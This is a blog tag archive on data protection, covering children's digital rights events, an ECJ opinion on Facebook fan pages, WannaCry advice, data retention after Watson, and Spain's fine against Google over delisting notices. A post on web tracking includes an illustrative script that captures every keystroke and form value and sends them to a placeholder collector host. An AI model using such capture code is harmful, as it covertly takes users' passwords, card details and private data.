Tag Archives: data protection

Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The conference’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The conference brought together regulators, practitioners, civil society, and leading academic experts to examine the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, the UK Digital Charter, and the Data Protection Bill, which will implement the EU General Data Protection Regulation and its provisions on matters such as consent, transparency, and profiling.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

How websites watch your every move and ignore privacy settings


In this guest post, Yijun Yu, Senior Lecturer in the Department of Computing and Communications at The Open University, examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personally identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.
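To make the mechanism concrete, here is a minimal, illustrative sketch in TypeScript of how a third-party “session replay” script of the kind the Princeton study describes can capture form input and mouse activity as it happens. The endpoint URL and payload fields are hypothetical, and a real script would batch and throttle these events; the point is that nothing in the browser prevents data leaving before a form is submitted, and honouring Do Not Track is left entirely to the script’s author.

```typescript
// Illustrative sketch only: a simplified "session replay" collector of the
// kind described in the Princeton study. The endpoint and payload shape are
// hypothetical; real scripts batch, throttle and compress these events.

const ENDPOINT = "https://collector.example.com/events"; // hypothetical

function report(event: Record<string, unknown>): void {
  // sendBeacon queues the data for delivery even if the page is closed,
  // so abandoning the form does not stop the report.
  navigator.sendBeacon(ENDPOINT, JSON.stringify(event));
}

// Every keystroke in every field is captured as it happens, long before
// (and regardless of whether) the user presses "submit".
document.addEventListener("input", (e: Event) => {
  const field = e.target as HTMLInputElement;
  report({ type: "input", field: field.name, value: field.value, ts: Date.now() });
});

// Mouse movements are recorded the same way.
document.addEventListener("mousemove", (e: MouseEvent) => {
  report({ type: "mouse", x: e.clientX, y: e.clientY, ts: Date.now() });
});

// Nothing above consults the Do Not Track signal; respecting it is a purely
// voluntary check that a script author may simply omit.
if (navigator.doNotTrack === "1") {
  console.log("User has enabled Do Not Track - this script ignores it.");
}
```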


Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post, Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis of a new ECJ opinion. This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns the jurisdiction of courts over civil and commercial disputes. While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidate the Court’s prior broad interpretation of the Data Protection Directive. While this might be the headline, it is worth considering a perhaps overlooked element of the data economy: the role of the content provider in supplying the individuals whose data is harvested.


The Surveillance Triangle: Authorities, Data subjects and Means

Readers of the Information Law and Policy Centre blog may be interested in the following event held by Maastricht University.

The academic conference addresses how surveillance is perceived from the perspectives of the three main stakeholders involved in the process: surveillance authorities, data subjects and companies. It brings together those perspectives and provides informative insights from academics in both the EU and the US on how these issues interplay in different contexts.

Programme

9:30-10:00 Registration
10:00-10:30 Keynote speech:
“The EU’s approach towards surveillance”, Philippe Renaudière, Data Protection Officer, European Commission
10:30-12:00 Panel I: The perspective of the authorities who exercise surveillance
12:00-13:30 Lunch
13:30-15:00 Panel II: The perspective of Individuals subject to surveillance
15:00-15:30 Coffee break
15:30-17:00 Panel III: Means of Surveillance
17:00-17:30 Closing remarks, Giovanni Buttarelli, EDPS
17:30-18:00 Wrap-up
18:00 Network Cocktail

Submissions to the Law Commission’s consultation on ‘Official Data Protection’: CFOI and Article 19

The Law Commission has invited interested parties to write submissions commenting on the proposals outlined in a consultation report on ‘official data protection’. The consultation period closed for submissions on 3 May, although some organisations have been given an extended deadline. (For more detailed background on the Law Commission’s work please see the first post in this series). 

The Information Law and Policy Centre is re-publishing on our blog some of the submissions written by stakeholders and interested parties in response to the Law Commission’s consultation report (pdf). In due course, we will collate the submissions on a single resource page. If you have written a submission for the consultation that you would like (re)-published, please contact us.

Please note that none of the published submissions reflects the views of the Information Law and Policy Centre, which aims to promote and facilitate cross-disciplinary law and policy research in collaboration with a variety of national and international institutions.

The second in our series is the joint response submitted by the Campaign for Freedom of Information and Article 19. The response was accompanied by a press release. (The first in this series was the Open Rights Group submission.)

Download (PDF, 417KB)

Call for Papers – Children and Digital Rights: Regulating Freedoms and Safeguards

We are pleased to announce this call for papers for the Information Law and Policy Centre’s Annual Conference on 17 November 2017 at IALS in London, this year supported by Bloomsbury’s Communications Law journal. You can read about our previous annual events here.

We are looking for high-quality and focused contributions that consider information law and policy within the context of children and digital rights. Whether based on doctrinal analysis or empirical social research, papers should offer an original perspective on the implications posed by the data-driven society for the regulation of the digital rights of children and young adults, and the freedoms and safeguards therein.

Topics of particular interest in 2017 include:

  • Internet intermediary liability
  • Social media
  • Data privacy
  • Internet of Things
  • Cyber security
  • UN Convention on the Rights of the Child
  • Online games/apps
  • Digital education
  • The EU General Data Protection Regulation

The workshop will take place on Friday 17th November 2017 and will be followed by the Information Law and Policy Centre’s Annual Lecture and an evening reception.

Attendance will be free of charge thanks to the support of the IALS and our sponsor, although registration is required as places are limited.

The best papers will be featured in a special issue of Bloomsbury’s Communications Law journal, following a peer-review process. Those giving papers will be invited to submit full draft papers to the journal by 1st November 2017 for consideration by the journal’s editorial team.

How to apply:

Please send an abstract of between 250 and 300 words and some brief biographical information to Eliza Boudier, Fellowships and Administrative Officer, IALS (eliza.boudier@sas.ac.uk), by Friday 14th July 2017 (5pm, BST).

Abstracts will be considered by the Information Law and Policy Centre’s academic staff and advisors, and the Communications Law journal editorial team.

About the Information Law and Policy Centre at the IALS:

The Information Law and Policy Centre (ILPC) produces, promotes, and facilitates research on the law and policy of information and data, and the ways in which law both restricts and enables the sharing and dissemination of different types of information.

The ILPC is part of the Institute of Advanced Legal Studies (IALS), which was founded in 1947. It was conceived, and is funded, as a national academic institution, attached to the University of London, serving all universities through its national legal research library. Its function is to promote, facilitate, and disseminate the results of advanced study and research in the discipline of law, for the benefit of persons and institutions in the UK and abroad.

The ILPC’s Annual Conference and Annual Lecture form part of a series of events celebrating the 70th Anniversary of the IALS in November.

About Communications Law (Journal of Computer, Media and Telecommunications Law):

Communications Law is a well-respected quarterly journal published by Bloomsbury Professional covering the broad spectrum of legal issues arising in the telecoms, IT, and media industries. Each issue brings you a wide range of opinion, discussion, and analysis from the field of communications law. Dr Paul Wragg, Associate Professor of Law at the University of Leeds, is the journal’s Editor in Chief.

Observing the WannaCry fallout: confusing advice and playing the blame game

In this guest post, researchers from the Information Security Group at UCL – Steven J. Murdoch, Angela Sasse, Wendy M. Grossman and Simon Parkin – consider what lessons should be learnt after the WannaCry ransomware attack.

As researchers who strive to develop effective measures that help individuals and organisations to stay secure, we have observed the public communications that followed the WannaCry ransomware attack of May 2017 with increasing concern. As in previous incidents, many descriptions of the attack are inaccurate – something colleagues have pointed out elsewhere. Our concern here is the advice being disseminated, and the fact that various stakeholders seem to be more concerned with blaming each other than with working together to prevent further attacks affecting organisations and individuals.

Countries initially affected in WannaCry ransomware attack (source Wikipedia, User:Roke)

Let’s start with the advice that is being handed out. Much of it is unhelpful at best, and downright wrong at worst – a repeat of what happened after Heartbleed, when people were advised to change their passwords before the affected organisations had patched their SSL code. Here is a sample of real advice sent out to staff in a major organisation post-WannaCry:

“We urge you to be vigilant and not to open emails that are unexpected, unusual or suspicious in any way. If you experience any unusual computer behaviour, especially any warning messages, please contact your IT support immediately and do not use your computer further until advised to do so.”

Useful advice has to be correct and actionable. Users have to cope with dozens, maybe hundreds, of unexpected emails every day, most containing links and many accompanied by attachments; they cannot take ten minutes to ponder each one before deciding whether to respond. Such instructions also implicitly and unfairly suggest that users’ ordinary behaviour plays a major role in causing major incidents like this one. RISCS advocates enlisting users as part of the frontline defence. Well-targeted, automated blocking of malicious emails lessens the burden on individual users, and builds resilience for the organisation in general.

In an example of how to confuse users, The Register reports that the City of London Police sent out its “advice” via email in an attachment entitled “ransomware.pdf”. Users are thus simultaneously exhorted to be “vigilant” and avoid opening unexpected attachments, and required to open an attachment in order to get that advice. The confusion resulting from contradictory advice is worse than the direct consequences of the attack: it enables future attacks. Why play Keystone Cyber Cops when the UK National Technical Authority for such matters, the National Cyber Security Centre, offers authoritative and well-presented advice on its website?

Our other concern is the unedifying squabbling between spokespeople for governments and suppliers, blaming each other for running unsupported software, not paying for support, charging to support unsupported software, and so on, with security experts weighing in on all sides. To a general public already alarmed by media headlines, finger-pointing creates little confidence that either party is competent or motivated to keep secure the technology on which all our lives now depend. When the supposed “good guys” expend their energy fighting each other, instead of working together to defeat the attackers, it’s hard to avoid the conclusion that we are most definitely doomed. As Columbia University professor Steve Bellovin writes, the question of who should pay to support old software requires broader collaborative thought; in avoiding that debate we are choosing, as a society, to pay for such security failures.

We would refer those looking for specific advice on dealing with ransomware to the NCSC guidance, which is offered in separate parts for SMEs and home users, and for enterprise administrators.

Much of NCSC’s advice is made up of things we all know: we should back up our data, patch our systems, and run anti-virus software. Part of RISCS’ remit is to understand why users often don’t follow this advice. Ensuring backups remain uninfected is, unfortunately, trickier than it should be. Ransomware will infect – that is, encrypt – not only the machine it’s installed on but any permanently-connected physical or network drive. This problem ought to be solved by cloud storage, but it can be difficult to find out whether cloud backups will be affected by ransomware, and technical support documentation often simply refers individuals to “your IT support”, even though vendors know few individuals have any. Dropbox is unusually helpful, and provides advice on how to recover from a ransomware attack and how far it can help. Users should be encouraged to read such advice in advance and factor it into backup plans.
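As a concrete illustration of the backup point, here is a minimal sketch (in TypeScript for Node.js, with hypothetical paths) of one mitigating pattern: writing dated snapshots rather than overwriting a single mirrored copy, so that an infection that encrypts the live files does not silently propagate into the only backup. The operational step that code cannot supply is just as important: the backup volume should be connected only while the backup runs, since ransomware encrypts any drive it can reach.

```typescript
// Minimal sketch of versioned (snapshot) backups, assuming Node.js 16.7+
// for fs.cpSync. Paths are hypothetical placeholders.

import * as fs from "fs";
import * as path from "path";

const SOURCE = "/home/alice/documents";      // hypothetical source folder
const BACKUP_ROOT = "/mnt/backup/snapshots"; // hypothetical; mount only during backup

function snapshot(): string {
  // Each run writes a fresh, dated copy instead of overwriting the last one,
  // so earlier snapshots survive even if today's source files are encrypted.
  const stamp = new Date().toISOString().replace(/[:.]/g, "-");
  const dest = path.join(BACKUP_ROOT, stamp);
  fs.cpSync(SOURCE, dest, { recursive: true });
  return dest;
}

const written = snapshot();
console.log(`Snapshot written to ${written}`);
// Crucial non-code step: unmount or disconnect BACKUP_ROOT afterwards.
// A permanently connected backup drive is just another target.
```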

There are many reasons why people do not update their software. They may, for example, have had bad experiences in the past that lead them to worry that security updates will fail or leave their system damaged, or incorporate unwanted changes in functionality. Software vendors can help here by rigorously testing updates and resisting the temptation to bundle in new features. IT support staff can help by doing their own tests that allow them to reassure their users that they will help resolve any resulting problems in a timely manner.

In some cases, there are no updates to install. The WannaCry ransomware attack highlighted the continuing use of desktop Windows XP, which Microsoft stopped supporting with security updates in 2014. A few organisations still pay for special support contracts, and Microsoft made an exception for WannaCry by releasing a security patch more widely. Organisations that still have XP-based systems should now investigate to understand why equipment using an unsafe, outdated operating system is still in use. Ideally, the software should be replaced with a more modern system; if that’s not possible the machine should be isolated from network connections. No amount of reminding users to patch their systems or telling them to “be vigilant” will be effective in such cases.

This article also appears on Bentham’s Gaze, the blog of the UCL Information Security Group.

Where to after Watson? The challenges and future of mass data retention in the UK

As our lives have increasingly become data-driven and digital by default, finding the balance between privacy and national security/law enforcement has become one of the central legal, political, and ethical debates of the information age. On 11 May, the Director of the Information Law and Policy Centre, Dr Nora Ni Loideain, joined a panel of experts at a Bingham Centre event to discuss the latest round in the legal debate – the Court of Justice of the European Union’s (CJEU) recent ruling in a case brought by Tom Watson MP against the UK government in regard to the legality of the Data Retention and Investigatory Powers Act (DRIPA). Although DRIPA has now expired, the CJEU Grand Chamber judgment delivered last December also calls into question the legal status of the legislation which replaced DRIPA in 2016, the Investigatory Powers Act (IP Act).

According to the panel chair, Professor Lorna Woods, the CJEU judgment took what might be considered a “strong view” on privacy and regarded mass data retention as “disproportionate” in relation to citizens’ right to privacy. In this regard, the ruling continued in the same vein as the landmark 2014 Digital Rights Ireland judgment, which struck down the EU’s instrument for mandatory mass data retention – the Data Retention Directive – and declared it incompatible with the rights to respect for private life and data protection protected by Articles 7 and 8 of the EU Charter of Fundamental Rights.

As we wait for the UK Court of Appeal to interpret the Watson/Tele2 judgment in relation to UK law, the panel considered what the Grand Chamber’s judgment might mean for mass data retention. In particular, Professor Lorna Woods put it to the panel and audience to consider whether the scope of data retention currently provided for under the IP Act 2016 was still possible in light of the reasoning of the CJEU Grand Chamber’s judgment.

Information Law Group 2nd Annual ‘Work in Progress’ Workshop

The Information Law Group at the University of Sussex warmly invites you to their 2nd Annual ‘Work in Progress’ Workshop on Wednesday 3rd May.

The workshop provides an opportunity to discuss current research and receive feedback in a highly focused, informal environment.

The event is preceded by a PhD workshop (11am-1pm) and followed by a lecture by Rob Wainwright, Director of Europol (5.30-6.30pm), entitled “The Role of Europol in Countering Organised Crime and Terrorism”.

Book Now

AGENDA

2.00pm – 3.30pm “Challenges to Competition Law in Information Markets”

Chair: Dr Judith Townend (Sussex); Discussant: Prof Chris Marsden (Sussex)

  • Dr Konstantinos Stylianou (Leeds) “Redefining Normal Competition: The Case Study of the ICT Industry”
  • Dr Konstantina Bania (EBU, TILEC) “The role of consumer data in the enforcement of competition laws”
  • Dr Nico Zingales (Sussex) “The rise of ‘infomediaries’ and its implications for antitrust enforcement”

3.30pm – 4.00pm Coffee Break

4.00pm – 5.30pm “Intermediary Platform Responsibility”

Chair: Prof Chris Marsden (Sussex); Discussant: Orla Lynskey (LSE)

  • Dr Andres Guadamuz (Sussex), “Whatever happened to our dream of an empowering Internet (and how to get it back)”
  • Dr David Erdos (Cambridge), “Intermediary Publisher Responsibility for Third Party Rights in European Data Protection”
  • Dr Felipe Romero Moreno (Hertfordshire), “The fake-news phenomenon in the 2016 post-crisis digital era”

5.30pm – 6.30pm Lecture: Rob Wainwright, Director of Europol “The Role of Europol in Countering Organised Crime and Terrorism”.

Communicating Responsibilities: The Spanish DPA targets Google’s Notification Practices when Delisting Personal Information

In this guest post, David Erdos, University Lecturer in Law and the Open Society, University of Cambridge, considers the 2016 Resolution made by the Spanish Data Protection Authority in relation to Google’s approach to de-listing personal information. 

The Court of Justice’s seminal decision in Google Spain (2014) represented the beginning rather than the endpoint of specifying the European data protection obligations of search engines when indexing material from the web and, as importantly, of ensuring adherence to those obligations.

In light of its over 90% market share of search, this issue largely concerns Google (Bing and Yahoo come in a very distant second and third place). To its credit, Google signalled an early willingness to comply with Google Spain. At the same time, however, it construed the decision narrowly. Google argued that it only had to remove specified URL links following ex post demands from individual European citizens and/or residents (exercising the right to erasure (A. 12c) and/or objection (A. 14)); only as regards searches made under their name; only on European-badged search domains (e.g. .uk, .es); and, even if the processing violated European data protection standards, not if the processing was judged to be in the ‘public interest’.

It also indicated that it would inform the Webmasters of the ʻoriginalʼ content when de-listing took place (although it signalled that it would stop short of its usual practice of providing a similar notification to individual users of its services, opting instead for a generic notice only).

In the subsequent two and a half years, Google’s approach has remained in broad terms relatively stable, although from early 2015 it did stop notifying Webmasters when de-listing material from malicious porn sites (p. 29), and from early 2016 it has deployed (albeit imperfect) geolocation technology to block the return of de-listed results when any version of the Google search engine (e.g. .com) is used from the European country from which the demand was lodged.

Many (although not all) of these limitations are potentially suspect under European data protection law, and indeed private litigants have already brought a number of challenges (successfully and unsuccessfully). No doubt partly reflecting their very limited resources, European Data Protection Authorities (DPAs) have adopted a selective approach, targeting only those issues which they see as the most critical. Indeed, the Article 29 Working Party’s November 2014 Guidelines focussed principally on two concerns:

  • Firstly, that the geographical scope of de-listing was too narrow. To ensure “effective and complete protection” of individual data subjects, it was necessary that de-listing be “effective on all relevant domains, including .com”.
  • Secondly, that communication to third parties of data concerning de-listing identifiable to particular data subjects should be both very limited and subject to strong discipline. Routine communication “to original webmasters that results relating to their content had been delisted” was simply unlawful and, whilst in “particularly difficult cases” it might in principle be legitimate to contact such publishers prior to making a de-listing decision, even here search engines must then “take all necessary measures to properly safeguard the rights of the affected data subject”.

Since the release of the Guidelines, the French DPA has famously (or infamously, depending on your perspective!) adopted a strict interpretation of the first concern, requiring de-listing on a completely global scale and fining Google €100K for failing to do this. That action has now been appealed before the French Conseil d’État and has attracted much attention, including from Google itself. In contrast, much less publicity has been given to the issue of third party communication.

Nevertheless, in September 2016 the Spanish DPA issued a Resolution fining Google €150K for disclosing information identifiable to three data subjects to Webmasters, and ordered it to adopt measures to prevent such practices recurring. An internal administrative appeal lodged by Google against this has since been rejected, and a challenge in court now seems inevitable. This piece explores the background to, nature of, and justification for this important regulatory development.

The Determinations Made in the Spanish Resolution

Apart from the fact that they had formally complained, there was nothing unusual in the three individual cases analysed in the Spanish Resolution.  Google had simply followed its usual practice of informing Webmasters that under data protection law specified URLs had been deindexed against a particular (albeit not directly specified) individual name.  Google sought to defend this practice on four separate grounds:

  • Firstly, it argued that the information provided to Webmasters did not constitute personal data at all. In contrast, the Spanish regulator argued that in those cases where the URL led to a webpage in which only one natural person was mentioned, directly identifiable data had been reported, whilst even in those cases where several people were mentioned the information was still indirectly identifiable, since a simple procedure (e.g. conducting a search on names linked to the webpage in question) would render the information fully identifiable. (Google’s argument here in any case seemed to be in tension with its practice since September 2015 of inviting contacted Webmasters to notify Google of any reason why the de-listing decision should be reconsidered – this would only really make sense if the Webmaster could in fact deduce what specific de-listing had taken place.)
  • Second, it argued that, since its de-listing form stated that it “may provide details to webmaster(s) of the URLs that have been removed from our search results”, any dissemination had taken place with the individual’s consent. Drawing especially on European data protection’s requirement that consent be “freely given” (A. 2 (h)), this argument was also roundly rejected. In using the form to exercise their legal rights, individuals were simply made to accept as a fait accompli that such dissemination might take place.
  • Third, it argued that dissemination was nevertheless a “compatible” (A. 6 (1) (b)) processing of the data given the initial purpose of its collection, finding a legal basis as “necessary” for the legitimate interests (A. 7 (f)) of Webmasters regarding this processing (e.g. to contact Google for a reconsideration). The Spanish DPA doubted that Webmasters could have any legitimate interest here: “search engines do not recognize a legal right of publishers to have their contents indexed and displayed, or displayed in a particular order”; the Court of Justice had referenced only the interests of the search engine itself and of Internet users who might receive the information; and, furthermore, the Court had been explicit that de-listing rights applied irrespective of whether the information was erased at source or even if publication there remained lawful. In any case, it emphasized that any such interest had (as article 7 (f) explicitly states) to be balanced against the rights and freedoms of data subjects, which the Court had emphasized must be “effective and complete” in this context. In contrast, Google’s practice of essentially unsafeguarded disclosure of the data to Webmasters could result in the effective extinguishment of the data subject’s rights, since Webmasters had variously republished the deindexed page against another URL, published lists of all URLs deindexed, or even published a specific news story on the de-listing decision.
  • Fourth, Google argued that its practice was an instantiation of the data subject’s right to obtain from a controller “notification to third parties to whom the data have been disclosed of any rectification, erasure or blocking” carried out in compliance with the right to erasure, “unless this proves impossible or involves a disproportionate effort” (A. 12 (c)). The Spanish regulator pointed out that, since the data in question had originally been received from rather than disclosed to Webmasters, this provision was not even materially engaged. In any case, Google’s interpretation of it was in conflict with its purpose, which was to ensure the full effectiveness of the data subject’s right to erasure.

Having established an infringement of the law, the Spanish regulator had to consider whether to pursue this as an illegal communication of data (judged ‘very serious’ under Spanish data protection law) or only as a breach of secrecy (judged merely ‘serious’). In the event, it plumped for the latter and issued a fine of €150K, in the mid-range of that set out for ‘serious’ infringements. As previously noted, it also ordered Google to adopt measures to prevent re-occurrence of these legal failings and required that these be communicated to the Spanish DPA.

Analysis

The Spanish DPA’s action tackles a systematic practice which has every potential to fundamentally undermine the practical enjoyment of rights to de-listing, and is therefore at least as significant as the ongoing regulatory developments in France concerning the geographical scope of those rights. The regulator was entirely right to find that personal data had been disseminated, that this had been done without consent, that the processing had nothing to do with the right (which, in any case, is not an obligation) of data subjects to have third parties notified in certain circumstances, and that this processing was “incompatible” with the initial purpose of data collection, which was to secure data subjects’ legal rights to de-listing.

It is true that the Resolution was too quick to dismiss the idea that original Webmasters do have “legitimate interests” in guarding against unfair de-listings of content. Even in the absence of a de jure right to such listings, these interests are grounded in their fundamental right to “impart” information (and ideas), an aspect of freedom of expression (ECHR, art. 10; EU Charter, art. 11). In principle, these rights and interests justify search engines making contact with original Webmasters, at least in particularly difficult de-listing cases, as the Working Party itself indicated.

However, even here dissemination must (as the Working Party also emphasized) properly safeguard the rights and interests of data subjects. At the least this should mean that, prior to any dissemination, a search engine should conclude a binding and effectively policeable legal contract prohibiting Webmasters from disseminating the data in identifiable form. (In the absence of this, those Webmasters outside European jurisdiction or engaged in special/journalistic expression cannot necessarily themselves be criticized for making use of the information received in other ways.)

In stark contrast to this, Google currently engages in blanket and essentially unsafeguarded reporting to Webmasters, a practice which has resulted in a breakdown of effective protection for data subjects not just in Spain but also in other European jurisdictions such as the UK – see here and here. Having been put on such clear notice by this Spanish action, it is to be hoped that Google will seriously modify its practices. If not, then regulators would have every right to treat this in the future as a (yet more serious) illegal and intentional communication of personal data.

Future Spanish Regulatory Vistas

The cases investigated by the Spanish DPA in this Resolution also involved the potential dissemination of data to the Lumen transparency database (formerly Chilling Effects), which is hosted in the United States; the potential for subsequent publication of identifiable data on its publicly accessible database; and even the potential for a specific notification to be provided to Google users conducting relevant name searches, stating that “[i]n response to a legal requirement sent to Google, we have removed [X] result(s) from this page. If you wish, you can get more information about this requirement on LumenDatabase.org.”

This particular investigation, however, failed to uncover enough information on these important matters. Google was adamant that it had not yet begun providing information to Lumen in relation to data protection claims post-Google Spain, but stated that it was likely to do so in the future in some form. Meanwhile, it indicated that the specific Lumen notifications found on name searches regarding two of the claimants concerned pre-Google Spain claims variously made under defamation, civil privacy law and data protection. (Even putting the data protection claim to one side, such practices would still amount to a processing of personal data, and they highlight the often marginal and sometimes arbitrary distinctions between these closely related legal causes of action.)

Given these complications, the Spanish regulator decided not to proceed directly on these matters but rather to open more wide-ranging investigatory proceedings concerning both Google’s practices in relation to disclosure to Lumen and the notifications provided to search users. Both sets of investigatory proceedings are ongoing. Such continuing work highlights the vital need for active regulatory engagement to ensure that the individual rights of data subjects are effectively secured. Only in this way will basic European data protection norms continue to ‘catch up’ not just with Google but with developments online generally.

David Erdos, University Lecturer in Law and the Open Society, Faculty of Law & WYNG Fellow in Law, Trinity Hall, University of Cambridge.

(I am grateful to Cristina Pauner Chulvi and Jef Ausloos for their thoughts on a draft of this piece.)

This post first appeared on the Inforrm blog.